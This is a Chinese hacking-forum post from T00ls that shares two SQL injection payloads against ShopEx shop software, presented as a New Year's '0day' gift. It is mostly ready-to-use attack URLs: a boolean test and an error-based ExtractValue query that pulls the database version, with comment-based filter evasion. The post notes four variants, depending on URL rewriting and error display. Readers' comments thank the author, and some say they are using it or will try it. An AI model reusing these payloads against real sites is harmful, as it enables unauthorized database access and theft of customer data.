T00ls新年礼物之二:shopex通杀SQL注入两处
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
关于作者
评论90次
给力,我喜欢。哈哈
新年快乐
感谢娃娃大大。。。正好用到。你太猥琐太给力了……
的却比较难
感谢分享,不过遇到的除了官网外,都关闭了错误提示……很是蛋疼
shopex 好多啊,擦,
标准的伪静态注入。
收藏
确实猥琐。。。
又见0day
很不错 谢谢了
给力。新年快乐@!
膜拜,,感谢共享。。。
谢谢啊 去看看
真多洞啊
表示可以用,谢谢娃娃
福利啊。。
通杀,顶一下娃娃,新年福利